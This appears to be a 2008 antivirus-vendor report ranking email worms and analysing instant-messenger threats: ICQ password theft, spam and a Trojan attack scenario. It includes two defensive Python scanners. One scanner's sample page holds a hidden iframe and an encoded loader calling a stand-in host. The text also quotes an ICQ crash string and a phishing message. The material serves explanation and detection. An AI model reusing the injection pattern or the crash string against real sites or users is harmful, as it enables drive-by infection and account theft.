Top 20 Viruses for May 20th 2008

| Position | Change in position | Name | Proactive Detection Flag | Percentage |
|---|---|---|---|---|
| 1 | 0 | Email-Worm.Win32.NetSky.q | Trojan.generic | 23.12 |
| 2 | +1 | Email-Worm.Win32.NetSky.y | Trojan.generic | 9.70 |
| 3 | +2 | Email-Worm.Win32.Scano.gen | Trojan.generic | 9.63 |
| 4 | +4 | Email-Worm.Win32.Nyxem.e | Trojan.generic | 6.75 |
| 5 | -3 | Email-Worm.Win32.NetSky.d | Trojan.generic | 6.27 |
| 6 | Return | Email-Worm.Win32.NetSky.x | Trojan.generic | 4.44 |
| 7 | -1 | Email-Worm.Win32.NetSky.aa | Trojan.generic | 3.74 |
| 8 | Return | Email-Worm.Win32.NetSky.b | Trojan.generic | 3.26 |
| 9 | -5 | Email-Worm.Win32.Bagle.gt | Trojan.generic | 2.75 |
| 10 | Return | Net-Worm.Win32.Mytob.u | Worm.P2P.generic | 2.60 |
| 11 | +6 | Net-Worm.Win32.Mytob.c | Trojan.generic | 2.40 |
| 12 | 0 | Email-Worm.Win32.Scano.bn | Trojan.generic | 2.09 |
| 13 | Return | Email-Worm.Win32.NetSky.r | Trojan.generic | 1.98 |
| 14 | +4 | Email-Worm.Win32.NetSky.t | Trojan.generic | 1.94 |
| 15 | Return | Net-Worm.Win32.Mytob.bi | Trojan.generic | 1.65 |
| 16 | -5 | Email-Worm.Win32.Bagle.gen | Trojan.generic | 1.39 |
| 17 | -4 | Email-Worm.Win32.Mydoom.l | Worm.P2P.generic | 1.19 |
| 18 | Return | Net-Worm.Win32.Mytob.t | Worm.P2P.generic | 1.08 |
| 19 | -3 | Email-Worm.Win32.NetSky.c | Trojan.generic | 0.97 |
| 20 | New! | Net-Worm.Win32.Mytob.cg | Worm.P2P.generic | 0.90 |
| | | Other malicious programs | | 12.15 |
The May 2008 Email Top Twenty is a short one; this is explained by the well-known fact that virus writers take a break over the summer months. The complete absence of any epidemics in mail traffic, which is obvious from even a cursory glance at this month's rankings, bears this out.
In fact, the only significant change to the rankings was caused by the re-entry of a few worms which have been in circulation for several years now.
Trojan-Downloader programs such as Agent.ica, Agent.hsl, and Diehard that were active during the first four months of 2008 disappeared without trace in May.
The Warezov and Zhelatin worms have not reappeared since dropping out of the Top Twenty back in February. The authors have stopped sending out the executable components of the worms by email, confining themselves to distributing the code via links on infected websites.
This does mean that the threat posed by malicious code in email has declined. However, phishing and spam continue to pose very real threats and have the potential to create just as big a problem for the end user.
Other malicious programs made up a significant percentage (12.15%) of all malicious code found in mail traffic.
The Top Twenty countries which acted as sources of infected emails in May are shown below:

| Position | Change | Country | Percentage |
|---|---|---|---|
| 1 | 0 | USA | 21.72 |
| 2 | +5 | Poland | 13.18 |
| 3 | -1 | South Korea | 7.88 |
| 4 | -1 | Spain | 5.85 |
| 5 | -1 | China | 5.15 |
| 6 | 0 | France | 4.07 |
| 7 | +1 | Germany | 3.54 |
| 8 | -1 | Brazil | 3.49 |
| 9 | 0 | United Kingdom | 2.83 |
| 10 | -2 | India | 2.82 |
| 11 | -1 | Italy | 2.66 |
| 12 | -1 | Israel | 1.80 |
| 13 | 0 | Japan | 1.66 |
| 14 | +5 | Canada | 1.15 |
| 15 | +2 | The Netherlands | 1.07 |
| 16 | -1 | Turkey | 1.05 |
| 17 | -1 | Australia | 1.03 |
| 18 | -4 | Argentina | 1.02 |
| 19 | +1 | Russia | 0.99 |
| 20 | New! | Austria | 0.91 |
| | | Other Countries | 16.13 |
Summary
Moved up: Email-Worm.Win32.NetSky.y, Email-Worm.Win32.Scano.gen, Email-Worm.Win32.Nyxem.e, Net-Worm.Win32.Mytob.c, Email-Worm.Win32.NetSky.t.
Moved down: Email-Worm.Win32.NetSky.d, Email-Worm.Win32.NetSky.aa, Email-Worm.Win32.Bagle.gt, Email-Worm.Win32.Bagle.gen, Email-Worm.Win32.Mydoom.l, Email-Worm.Win32.NetSky.c.
Returned: Email-Worm.Win32.NetSky.x, Email-Worm.Win32.NetSky.b, Net-Worm.Win32.Mytob.u, Email-Worm.Win32.NetSky.r, Net-Worm.Win32.Mytob.bi, Net-Worm.Win32.Mytob.t, Net-Worm.Win32.Mytob.cg.
No change: Email-Worm.Win32.NetSky.q, Email-Worm.Win32.Scano.bn.
Instant threats
IM clients
For many people, communicating online has become an integral part of daily life. The multitude of options for communicating with others – email, chat, forums, blogs, etc. — all occupy their own specific place on the Internet. Instant messengers (IM), which allow users to talk to others anywhere in the world in real time, are one of the popular alternatives.
In order to use IM, a user needs an Internet connection and a client application installed on their PC. There are lots of IM applications and almost all support the same basic functions, allowing a user to search for other users with similar interests, access personal profiles, choose a status mode, etc. A number of IM clients (or Internet pagers, as they are sometimes called) offer additional features.
The most popular IM client in Russia is undoubtedly ICQ – a playful abbreviation of the phrase “I seek you”. Every ICQ user has a unique number, or UIN (Unified Identification Number) that s/he uses to log on. Each UIN is protected by a password set by the user. Messages are sent via the TCP/IP transport protocol using a format specially created by the developer Mirabilis. As a rule, a single message consists of one TCP packet. Some other clients also make use of modified versions of this protocol to send messages, e.g. QIP (Quiet Internet Pager) and Miranda.
Microsoft’s MSN Messenger (or Windows Live Messenger) is another IM client popular with users in the West. MSN Messenger uses Microsoft Notification Protocol (MSNP, also known as Mobile Status Notification Protocol). The MSNP2 protocol is publicly available, although other versions are not. The latest version of MSN Messenger uses MSNP14.
QQ, an IM application similar to ICQ, is very popular in China.
Figure 1. The Chinese IM client QQ
As well as standard IM functions, Skype also offers voice chat. This client, which is popular around the world, allows users to exchange voice messages for free. To do this, the user needs a headset and a computer with the application and an Internet connection. Skype can also be used to call any telephone number, although this is not a free service.
IM threats
Unfortunately, the virtual world is open to abuse and instant messaging applications are not immune. IM is often the target of the following malicious activities:
Stealing passwords to IM accounts using brute force attacks or social engineering.
Spreading malware (this can be done in two ways):
Messages are sent which contain links; if the user clicks on the link, a malicious program file is downloaded to the user’s PC. Social engineering is used to tempt the user to open the file and by doing so, launch the malicious program.
Messages are sent which contain links to infected websites.
Spam.
All IM applications are vulnerable to some type of threat. Take, for instance, the popular Chinese IM client QQ. Trojan-PSW.Win32.QQPass and a related program, Worm.Win32.QQPass, are both widespread in China and were specially created to steal QQ client passwords. Worm.Win32.QQPass propagates by copying itself to removable media along with an autorun.inf file (this ensures the worm will be launched on an uninfected computer as long as the Autorun function is enabled).
Skype has also not escaped the attention of virus writers. Worm.Win32.Skipi spreads via Skype by sending a link to its executable file to all Skype contacts on the victim machine. The worm also spreads by copying itself to removable media together with a file called "autorun.inf". In addition to this, it will prevent antivirus solutions and Windows from being updated by editing the hosts file, and also attempts to terminate processes associated with security applications. And of course, the picture wouldn't be complete without a Trojan: Trojan-PSW.Win32.Skyper is designed to steal Skype account passwords.
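The two mechanisms just described, an autorun.inf on removable media and a hosts file edited to block security updates, both leave plain-text artefacts that an analyst can triage. The script below is an added example, not Kaspersky Lab code or any sample from the article: it parses an autorun.inf and grades what it would launch, and it reports any hosts entry that overrides a domain on a watchlist. The sample files, the watchlist and the heuristic folder and extension lists are all constructed assumptions.

```python
"""Triage helpers for autorun.inf on removable media (QQPass, Skipi) and for a
hosts file edited to block antivirus and Windows updates (Skipi).
Added example, not Kaspersky Lab code; samples and watchlist are constructed."""
import configparser

# Extensions an autorun.inf on a USB stick should never launch directly (heuristic).
EXECUTABLE_EXTS = (".exe", ".com", ".scr", ".pif", ".bat", ".cmd", ".vbs")
# Folder names Explorer normally hides from the user (heuristic list).
HIDDEN_DIRS = ("recycler", "recycled", "$recycle.bin", "system volume information")
# Targets that make a hosts entry a block rather than a redirect.
BOGUS_TARGETS = {"127.0.0.1", "0.0.0.0", "::1"}


def parse_autorun(text):
    """Return the [autorun] section of an autorun.inf as a lowercase-keyed dict."""
    cp = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    cp.optionxform = str.lower
    try:
        cp.read_string(text)
    except configparser.Error:
        return {}  # no section header or otherwise unparsable: nothing to grade
    return dict(cp.items("autorun")) if cp.has_section("autorun") else {}


def autorun_findings(text):
    """List (level, detail) findings; 'high' means the file launches code on insertion."""
    findings = []
    for key, value in parse_autorun(text).items():
        # open=, shellexecute= and shell\<verb>\command= all name a program to run
        if key in ("open", "shellexecute") or key.startswith("shell\\"):
            command = value.split()[0].lower() if value.split() else ""
            level = "high" if command.endswith(EXECUTABLE_EXTS) else "medium"
            findings.append((level, f"{key}= launches {value!r}"))
            parts = command.replace("/", "\\").split("\\")
            if any(p in HIDDEN_DIRS or p.startswith(".") for p in parts[:-1]):
                findings.append(("high", f"payload kept in a folder Explorer hides: {command}"))
        elif key == "icon":
            findings.append(("low", f"drive icon overridden ({value}); harmless alone, a disguise next to a launcher"))
    return findings


def autorun_verdict(text):
    """Collapse the findings to the worst level, or 'none' when nothing was flagged."""
    levels = [level for level, _ in autorun_findings(text)]
    for level in ("high", "medium", "low"):
        if level in levels:
            return level
    return "none"


def hosts_findings(text, watchlist):
    """Return (ip, hostname, effect) for every hosts entry that overrides a watched domain.
    Pointing an update server at localhost blocks updates; pointing it elsewhere
    can feed the machine a fake one, so both cases are reported."""
    hits = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        ip, *names = line.split()
        for name in names:
            name = name.lower()
            if any(name == d or name.endswith("." + d) for d in watchlist):
                hits.append((ip, name, "blocked" if ip in BOGUS_TARGETS else "redirected"))
    return hits


# Constructed samples (not real malware artefacts).
SAMPLE_AUTORUN = r"""[autorun]
open=RECYCLER\autorun.exe
shell\open\command=RECYCLER\autorun.exe -q
icon=%SystemRoot%\system32\SHELL32.dll,4
"""
BENIGN_AUTORUN = "[autorun]\nicon=setup.ico\nlabel=Holiday photos\n"
SAMPLE_HOSTS = """# constructed: a hosts file after the kind of edit described for Skipi
127.0.0.1   localhost
127.0.0.1   windowsupdate.com
127.0.0.1   www.windowsupdate.com
0.0.0.0     update.example-av.com
"""
WATCHLIST = ("windowsupdate.com", "update.microsoft.com", "example-av.com")  # assumed list

if __name__ == "__main__":
    for level, detail in autorun_findings(SAMPLE_AUTORUN):
        print(f"[{level}] {detail}")
    for ip, name, effect in hosts_findings(SAMPLE_HOSTS, WATCHLIST):
        print(f"hosts: {name} -> {ip} ({effect})")
```

The autorun grading deliberately treats any launcher as at least "medium": a legitimate driver CD may use open=, but a USB stick full of holiday photos has no reason to. The hosts check reports redirects as well as blocks, because a vendor domain pointed at an attacker-controlled address is worse than one pointed at localhost.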
Microsoft’s MSN Messenger is actively used to spread IRC bots. Many of them are capable of propagating via the messaging client when they receive a command from a remote user via a backdoor. For instance, if a cybercriminal has a small botnet s/he wants to extend, s/he sends a command to backdoors on the infected machines. The command instructs the machines to send a message with a link such as http://www.***.com/www.funnypics.com to all MSN Messenger contacts on those machines. After that, everything depends on the person that receives the message. If he decides to look at the “funny pics”, that means another computer will be added to the zombie network – by clicking on the link the user downloads a backdoor to his/her machine.
Malicious users exploit MSN Messenger because it is included in the Windows installation package. This means all Windows users automatically have the MSN client on their machines. The popularity of MSN around the world makes it all the more attractive to cybercriminals wanting to increase the number of infected computers in their botnets.
Figure 2. Part of Backdoor.Win32.SdBot.clg.
The underlined sections show the commands used to spread the Trojan
ICQ threats
This section provides an overview of the most common attack methods used to target IM clients, using ICQ as an example.
Password theft
As mentioned above, all ICQ users have a Unified Identification Number, or UIN. At the moment, nine-digit numbers are the most common. However, many users are keen to have a UIN that is identical to their mobile phone number, a numerical palindrome, or in which all the digits are the same. Such UINs are easy to remember and, for some, a matter of prestige. ICQ numbers with five, six or seven digits, which may contain only two different numbers, are seen as being particularly valuable.
‘Attractive’ UINs are traded, often fetching high prices. Many sites even have a number ordering service that promises to “obtain” the number wanted by the customer. Moreover, batches of unremarkable nine-digit numbers are offered to those interested in sending mass mailings. Using multiple numbers to distribute spam makes it possible to evade the anti-spam blacklists used by irritated users to ignore specific numbers.
The vendors of such ‘prestigious’ numbers rarely mention how the numbers are obtained. E-commerce sites contain assurances that the UINs are being sold legally. In most cases, however, the vendor has acquired the ICQ numbers by illegal means.
A number of methods are used to steal UINs. The multitude of Internet stores selling attractive UINs often engage in industrial-scale password searches and account theft. Another method is to steal the password to the ICQ user’s primary email and then use it to change the original UIN password without the user’s knowledge. Here's a more detailed overview of how this works.
ICQ technical support offers a service for users that have forgotten their UIN passwords. The process of restoring a password has been modified several times and has become more sophisticated. It now acts as a fairly reliable safeguard against password theft. Users are required to answer a question that they themselves set. If they have forgotten the answer, then the question can be changed using their primary email – the email address entered in the contact information during registration. The process is reasonably secure, but if a third party has somehow gained access to the primary email, the UIN is there for the taking. After obtaining the password to the primary email it is possible for a malicious user to contact ICQ pretending to be an account holder who has forgotten his or her UIN password. The malicious user can then prevent the original owner from accessing not only his or her ICQ account but also the primary email simply by changing the old password. Theft of this kind is not easy – obtaining passwords to email accounts linked to ICQ numbers requires a very powerful computer or even network.
However, the most popular method for stealing ICQ numbers is by using malicious programs, and Trojan-PSW.Win32.LdPinch in particular. Over the last few years this family of Trojans has come to pose a real threat to users. LdPinch not only steals passwords to ICQ and other IM clients such as Miranda but also to email accounts, various FTP programs, online games etc. There are dedicated constructor programs designed to create specific types of malicious Trojans. Such programs make it possible to set parameters defining which user passwords the malware will steal once installed on the victim machine. Once the program has been configured, the malicious user only has to provide an email address where confidential information will be sent. The ease with which these malicious programs can be created means they are prevalent not only in mail traffic but also in IM traffic.
Figure 3. Constructor used to create Trojan-PSW.Win32.LdPinch
Spreading malicious programs
Mail traffic contains a range of malware families which either spread themselves, or are sent via spam. ICQ, however, is generally used to spread three types of malicious program:
IM worms – these malicious programs use the IM client to self-propagate.
Trojans designed to steal passwords, including passwords for ICQ numbers (in the vast majority of cases, it is Trojan-PSW.Win32.LdPinch).
Malicious programs classified by Kaspersky Lab as Hoax.Win32.*.* (malware created to fraudulently obtain money from users).
How exactly is ICQ used to spread malware?
IM worms require little or no user interaction to spread. When run, many IM worms send themselves to the IM contacts on the victim machine. These worms have a range of functions: they can steal passwords, create botnets and, sometimes the payload is purely destructive (e.g. deleting all .mp3 files from the victim machine). Malicious programs such as Email-Worm.Win32.Warezov and Email-Worm.Win32.Zhelatin (Storm Worm) have used ICQ to actively spread.
However, in most cases user action is required to ensure that an attack will be successful. A wide variety of social engineering ploys can be used to make a potential victim click on a link, and open a file if one is downloaded from the link.
Here's an example of an attack designed to download malware to the victim’s machine. First of all, the malicious user creates several user accounts with seductive profile information (e.g. “pretty girl, 22, looking for a man”). Bots (small programs with primitive intelligence that can support a basic conversation) are then linked to that profile number. The first thing users usually want to see is a photograph of the “pretty girl”; the bot responds to such requests by sending a link. Needless to say, the link doesn't lead to a photo, but to a malicious program.
A variation on the above is when a link to a malicious program is inserted in the personal details of the “girl”. This type of attack requires more effort than the previous method. For example, at least a few of the main personal information fields have to be filled in and potential victims have to be selected. Then a conversation has to be struck up to ensure that users are tempted to click on the link to “nice photos from the Pacific coast” in the “girl’s” personal details.
Social engineering ploys are also used when spreading malicious programs with the help of ICQ spam. More precisely, it's not the malware itself that is spread – users are sent links to malicious programs.
Links in spam can also lead to sites (legitimate ones that have been hacked, or ones which have been specially created) which contain Trojan-Downloader programs. These downloaders then install other malicious software on the victim computer. A more detailed description of such attacks is given below.
Browser vulnerabilities (in particular, those in Internet Explorer) are frequently exploited to download malware with the help of malicious code already placed on a website. First of all, a popular legitimate site will be attacked, and code (e.g., an iframe or encrypted JavaScript) placed on its pages. This code will in turn download a malicious program to the computers of those who visit the site. Another technique is to create a simple site on cheap or free web hosting – a site which contains similar downloader code. The site will then be advertised using mass mailings via IM. If a user clicks on a link to the site, malicious software will be secretly downloaded to the victim machine. The user may not even suspect that the site s/he visited was attacked or was a fake. Meanwhile, LdPinch or IRCBot will be busily running on the infected computer.
The vulnerabilities used in carrying out such attacks can be present in the instant messaging applications themselves. In many cases the vulnerability can lead to buffer overflow and the execution of arbitrary code on a system, or provide remote access to a computer without the user's knowledge or consent.
If the malicious code that is run on a system after a buffer overflow is able to self-propagate, then by using the same application vulnerability on other machines the program can penetrate the computers of a significant number of users, causing an epidemic. Exploiting vulnerabilities requires a high degree of technical skill, and this limits, to some extent, the options open to cybercriminals.
ICQ spam has recently been used to spread fake programs that supposedly generate pin codes for cards used to pay for various mobile phone services. Kaspersky Lab detects these programs as not-virus.Hoax.Win32.GSMgen. In actual fact, such software generates unlimited quantities of randomly generated numbers that are supposed to be pin codes for cards used to top up telephone accounts. The results generated by the program are encrypted and in order to decipher them a key has to be obtained from the author, which, of course, comes at price. The sum is usually small – about $10-$15 – which makes the offer even more attractive. The reasoning goes something like this: “I pay $15 once and then I can use my mobile phone for the rest of my life for free!” The fact that the number received in return for payment does not top up an account makes this an everyday case of fraud. (It should be noted that if the program did indeed generate pin codes to pay for mobile services, the price would be significantly higher, and the authors would keep a much lower profile so as not to attract the attention of mobile operators and law enforcement agencies.)
ICQ spam
Unlike email spam, ICQ spam has not been researched in depth. Below are the results of a small study conducted from February 23 to March 23, 2008. The research involved categorizing the subjects of unwanted messages sent to ICQ users and performing a comparative analysis of ICQ spam vs. email spam.
Popular subjects in ICQ spam
The subjects in ICQ spam messages are quite varied and can include advertisements for a new website or game server, requests to vote for somebody in a contest, offers to buy expensive mobile phones at reduced prices or messages that include URLs that lead to malicious programs. A spam link can lead to a website with an exploit that uses vulnerabilities in Internet Explorer or other popular browsers (messages with malicious links were not classified as a separate category for the purposes of this study).
Figure 4. Distribution of ICQ spam by subject
Advertising of Entertainment Sites (18.47%) came top of the rankings. In all probability, this category will continue to lead the ICQ spam statistics. The main reason for its popularity is the effectiveness of this type of spam. Take a typical situation when someone who has been working on a computer for a long period receives an ICQ message about a new website with lots of funny images/stories/videos etc. It is very likely that the tired user will follow the link in the message as a diversion from work.
The Adult Spam category in second place (17.19%) circulates messages similar to those in email spam that advertise dating sites, porn resources, individuals' pages which contain erotic material etc.
The Online Income category (15.83%) includes messages that promise money in return for clicking on banners, visiting certain websites and looking at advertising. It also includes network (or multilevel) marketing offers.
The Other Spam category (12.77%) consists of messages on different subjects, each of which accounts for a relatively low percentage of spam traffic, making it impossible to classify them in individual categories. Some of the message authors in this category have very vivid imaginations. They send a variety of chain letters, toothpaste ads, predictions by archbishops of a fascist dictatorship in Russia, etc. Among the goods advertised, DVDs and car parts are predominant. ICQ phishing messages, which will be discussed later in this article, also fall into this category.
Messages related to ICQ in some way were included in the category in fifth position of our ranking (8.17%). One interesting phenomenon is “ICQ chain letters”, most of which contain the following text (translated from Russian):
“WARNING !!! Starting 1.12, ICQ will beCome a paid service. You can prevent this, send this message to 20 people from your contact list. This is not a joke (source www.icq.com) If you send it 20 times you will receive an email and your flower will beCome blue. I.e. you will be among those who are against. If voting wins, ICQ will reMain free.”
The only things that change are the date and the number of people to whom the message is supposed to be sent. Interestingly, some messages contain multi-level quoting, indicating that many users really believe someday their “flower will become blue” and ICQ will remain free forever.
Messages in different languages that urge users to upgrade to the new, sixth version of the ICQ client are also sent on a regular basis. At first, it was unclear why these messages were so popular among spammers. There was unconfirmed information that ICQ 6.x includes a vulnerability that leads to errors when processing messages formed in a certain way. On February 28, 2008 this was confirmed: according to http://bugtraq.ru, “…sending a specially formed … message (in the simplest case, "%020000000s") to a user with ICQ 6.x installed results in an error when generating HTML code to display messages in the embedded Internet Explorer component. This error may lead to the execution of arbitrary code on the remote system.” This vulnerability is not present in the latest build of the ICQ client.
Messages in the Computer Games category (5.79%) can be divided into two large groups. Messages in the first group advertise various browser-based online games, those in the other – game servers, mostly for Lineage II and Counter-Strike.
Offers of Illegal Services (5.45%) are only one third of a percentage point behind computer game ads. These offer users the chance to get the password to a specific mailbox, organize a DoS attack, make counterfeit documents (both Russian and non-Russian), and learn how to hack credit cards or obtain the information necessary to do so – all for a price.
Eighth position (5.28%) went to the category containing messages that ask users to vote for specific participants in a range of Internet contests.
Job and joint business offers came ninth (4.17%) and offers of computer services, including hosting, tenth (3.22%).
The Mobile Spam message group at the end of the rankings (2.72%) also consists of two types of messages. The first type includes messages that advertise websites selling mobile phones. The prices of popular models on such sites are often significantly lower than market prices, raising suspicions as to the origin and legality of such telephones. The second type is messages that advertise sites with a variety of mobile content.
During the period from February 23 to March 23, 2008, no more than 1% of messages in ICQ spam were found to be advertising medications or health related services.
Phishing messages are also occasionally sent to ICQ users. These messages were not categorized as an individual group because they are relatively rare. Cybercriminals use social engineering methods when attempting to obtain passwords to users’ UINs. The success or failure of such attacks largely depends on how well informed a user is. If there are genuine problems, as a rule the official ICQ support service will inform users of the problems, but it will never ask them to send their passwords by email or enter it in a web form on a website.
Figure 5. Phishing message sent in an attempt to obtain an ICQ account password
Hello, this is a message from the ICQ security system. An attempt has been made to steal your ICQ number. To prevent this in the future, it is recommended that you send your ICQ number and password for processing to our address administrat-icqo2008@rambler.ru. You will receive a reply within an hour. Thank you for using our system.
Distinguishing characteristics of ICQ spam
Unlike email, ICQ makes it possible to search for people based on the interests described in their user contact information. This makes it possible for cybercriminals to target specific audiences with their spam. It is fairly easy for spammers to get relevant data (in most cases, the ages and interests of users) and use it to gain the attention of spam recipients.
Practically all spam messages come from UINs that are not on the user’s contact list. The number of unwanted messages received by a user in any given period of time depends on the UIN. Users with six-digit UINs receive an average of 15 to 20 unwanted messages every hour, many of which contain links to Trojan-PSW.Win32.LdPinch. Users with nine-digit numbers that have nothing special about them receive an average of 10 to 14 such messages every day, while users with 'attractive' numbers get 2 to 2.5 times more spam.
In terms of message subjects, ICQ spam significantly differs from email spam. While about 90% of email spam advertises various goods and services, the proportion of such advertising in ICQ spam is less than 13% (the total share of the Illegal Services, Computer Services, Mobile Spam and Medical Spam categories), with Illegal Services (5.45%) being the largest of all the categories offering services.
On the whole, entertainment-related subjects predominate in ICQ spam. The reason for this is that ICQ is rarely used for business communication, while most of its users are young people. Spammers take the interests of their target audience into account: ICQ spam is dominated by invitations to visit entertainment sites and by ‘adult’ advertisements. Spam in the Computer Games, Voting and Mobile Spam categories also targets young people. On the whole, young people are targeted by about 50% of all spam messages.
The low share of ‘medical’ spam (traditionally a leading category in email spam) is also determined by the target audience. In ICQ spam, the share of this category is below 1%. Apparently, ICQ users do not respond as required to advertising of medical goods and services.
Distinguishing characteristics of ICQ spam:
Targets a young audience.
Overall bias towards entertainment.
Virtually no advertising of consumer goods. Exceptions are offers for mobile phones and pharmaceuticals, as well as a small number of messages which fall into the category of Other Spam.
Relatively high percentage (8.17%) of messages related to ICQ itself.
Significant proportion (5.45%) of messages offering illegal services. The most popular offers are email and ICQ hacking, counterfeit documents, credit card hacking.
An attack scenario
The user launches a file downloaded using a link received via ICQ, but the photo promised by the spammer never shows up on the screen. The user waits for a minute or two, and in the meantime the Trojan searches the computer for passwords stored on it. Some of the passwords are encrypted, but they can be easily decrypted by the cybercriminal. Then the Trojan collects all the passwords found and creates an email message containing all the confidential information collected. The message is sent to the cybercriminal’s email address which was created a couple of days prior to the attack. To prevent the Windows firewall from warning the user of the danger, the Trojan disables the firewall by modifying the relevant registry key. The Trojan also takes similar action against other programs that could prevent it from stealing passwords and other important information from the user. Finally, the malicious program creates a .bat file that deletes both the Trojan and itself, thereby destroying any traces of malicious activity.
By the time a user begins to suspect that something suspicious is going on, the hacker will have processed tens or hundreds (depending on the mailing size) of messages with passwords sent by the Trojan. Incidentally, many users remain unaware that any malicious activity has taken place at all. In any case, the only evidence the user has is a link to a non-existent photo, so the chances of tracing the cybercriminal are very slim.
Users often console themselves by saying they had nothing of importance on their computers anyway. But a hacker or cybercriminal wouldn't agree: s/he now has an impressive list of passwords to email accounts, FTP clients and online games, as well as the user’s bank account and, yes, the ICQ account itself.
You could ask why the hacker might need one more nine-digit number that nobody knows. This is why: s/he will enter the password in their ICQ client and gain access to the user’s contact list. A message will then be sent to all users on the contact list asking them to lend 50 e-dollars and promising to repay the debt the next day. The rest will depend on the recipients’ generosity and their relationship with the user whose account has been stolen. Usually, it is not too difficult to persuade a hesitant user to oblige. At the same time, the hacker will be chatting to other users on the contact list, trying to persuade them to pay up as well. Even if only one person on every victim’s contact list agrees to pay the virtual money to the hacker, the latter will receive a considerable amount of money comparable to the daily wages of a good programmer or even more – all for an hour of chatting.
What about the FTP account? What will happen if the FTP server to which the cybercriminal gained access using the stolen password stores the web pages belonging to a sufficiently popular website? The cybercriminal will be able to add a simple iframe or encrypted JavaScript code at the end of each web page, which will surreptitiously download and launch a malicious program to all computers used to view the site.
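Both this paragraph and the earlier description of attacks on legitimate sites come down to the same two artefacts on the compromised web server: an iframe the visitor cannot see, and a script block that hides its real content behind unescape()/eval() style decoding, typically appended after the page's proper end. The scanner below is an added example (not the article's or any vendor's code) that a site owner could run over their own pages after an FTP credential scare; the sample pages are constructed and the size and escape-count thresholds are assumptions to tune on real content.

```python
"""Scan a page for the injection described above: a hidden iframe or an
obfuscated script block, especially one appended after </html>.
Added example, not the article's or any vendor's code; samples are constructed."""
import re
from html.parser import HTMLParser


class _Collector(HTMLParser):
    """Record every iframe and script with its position, plus where </html> was seen."""

    def __init__(self):
        super().__init__()
        self.iframes, self.scripts = [], []   # (pos, attrs) / (pos, body)
        self.html_end = None
        self._script = None                   # (pos, [chunks]) while inside <script>

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append((self.getpos(), {k: (v or "").lower() for k, v in attrs}))
        elif tag == "script":
            self._script = (self.getpos(), [])

    def handle_data(self, data):
        if self._script is not None:
            self._script[1].append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            pos, chunks = self._script
            self.scripts.append((pos, "".join(chunks)))
            self._script = None
        elif tag == "html":
            self.html_end = self.getpos()


def _tiny(value):
    """True for a width/height of 0 or 1 (with or without px)."""
    m = re.fullmatch(r"\s*(\d+)\s*(?:px)?\s*", value)
    return bool(m) and int(m.group(1)) <= 1


def _hidden_reasons(attrs):
    reasons = [f"{d}={attrs[d]}" for d in ("width", "height") if d in attrs and _tiny(attrs[d])]
    if re.search(r"display\s*:\s*none|visibility\s*:\s*hidden", attrs.get("style", "")):
        reasons.append("hidden by style")
    return reasons


# Calls that decode-then-run content; two of them together, or one plus a long
# run of %xx / \x escapes, is the heuristic used here (assumed thresholds).
OBFUSCATION_CALLS = ("eval(", "unescape(", "fromcharcode(", "document.write(")


def _obfuscation_reasons(body):
    low = body.lower()
    calls = [c for c in OBFUSCATION_CALLS if c in low]
    escapes = len(re.findall(r"%[0-9a-f]{2}|\\x[0-9a-f]{2}", low))
    if len(calls) >= 2 or (calls and escapes >= 20):
        return calls + ([f"{escapes} escaped bytes"] if escapes else [])
    return []


def scan_page(html):
    """Return human-readable findings; an empty list means nothing matched."""
    c = _Collector()
    c.feed(html)
    c.close()
    findings = []
    for pos, attrs in c.iframes:
        reasons = _hidden_reasons(attrs)
        if reasons:
            findings.append(f"hidden iframe -> {attrs.get('src', '?')} ({', '.join(reasons)})")
        if c.html_end is not None and pos > c.html_end:
            findings.append(f"iframe placed after </html> at line {pos[0]}")
    for pos, body in c.scripts:
        reasons = _obfuscation_reasons(body)
        if reasons:
            findings.append(f"obfuscated script at line {pos[0]} ({', '.join(reasons)})")
        if c.html_end is not None and pos > c.html_end:
            findings.append(f"script placed after </html> at line {pos[0]}")
    return findings


# Constructed sample pages: a clean one and the same page with an injection appended.
CLEAN_PAGE = (
    "<html><head><title>News</title><script>var section = 'news';</script></head>\n"
    "<body><p>Welcome</p>"
    '<iframe src="https://www.example.com/widget" width="300" height="200"></iframe>'
    "</body></html>\n"
)
_LOADER = "<script src='http://www.example.net/x.js'></script>"  # what the injection decodes to
INJECTED_PAGE = CLEAN_PAGE + (
    '<iframe src="http://www.example.net/in.php" width="0" height="0" style="display:none"></iframe>\n'
    '<script>document.write(unescape("' + "".join("%%%02X" % ord(ch) for ch in _LOADER) + '"))</script>\n'
)

if __name__ == "__main__":
    for finding in scan_page(INJECTED_PAGE):
        print(finding)
```

Run this over every HTML file the FTP account could reach, not just the home page: the article's point is that the code is added to each page, so one clean index.html proves nothing. A position after </html> is the cheapest signal of all, since no content-management system writes there on purpose.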
All the actions described above are easy to automate. A cybercriminal can easily find ICQ UINs to send spam to on numerous dating sites and forums. More precisely, this will be done by a special program that does all the routine work, including filtering out duplicate numbers and checking the spam list for inactive numbers. Then the hacker will upload a Trojan to a website registered with a free hosting service and will send a link to the website using the spam list created by the hacker’s software. After this, another program will sort the numerous messages sent by the Trojans launched on victim computers and categorize the passwords received. The list of new ICQ numbers received from the Trojan will be converted to a new spam list. If an infected user’s ICQ number turns out to be attractive (i.e., easy to remember), it can be sold later for a large amount of money. And then the final stage – sending messages with convincing requests to lend a little money. If a reply to the request is received, it's time for the hacker to get involved and use his or her knowledge of psychology and social engineering techniques. After this, the ‘hijacked’ numbers can be sold wholesale to spammers. The process described above may sound like fiction, but in actual fact, such schemes are quite common.
To summarize, here's a list of why cybercriminals attack IM clients:
Selling stolen ICQ numbers (nine-digit numbers are sold wholesale and ‘attractive’ numbers are sold individually for significant amounts of money).
Creating spam lists for sale to spammers or for mass distribution of malicious programs.
Using the contact lists of victims as trusted sources to ‘borrow’ money.
Downloading malicious programs using software vulnerabilities.
Changing the web pages of legitimate sites (using FTP server passwords) to download malicious software to visitors’ computers.
Creating botnets or extending existing zombie networks.
Other malicious activity.
Counteracting attacks on IM systems
What can users do against such sophisticated and relentless attacks? Defend themselves, naturally! Below is advice to help readers protect themselves against threats that spread via IM clients.
First of all, be careful and do not click thoughtlessly on links in received messages. Listed below are several types of messages that users should view with extreme caution:
Messages received from unknown users with strange nicknames (such as SbawpathzsoipbuO).
Messages from users on your contact list asking you to look at new photos, where the 'photos' have an .exe file extension.
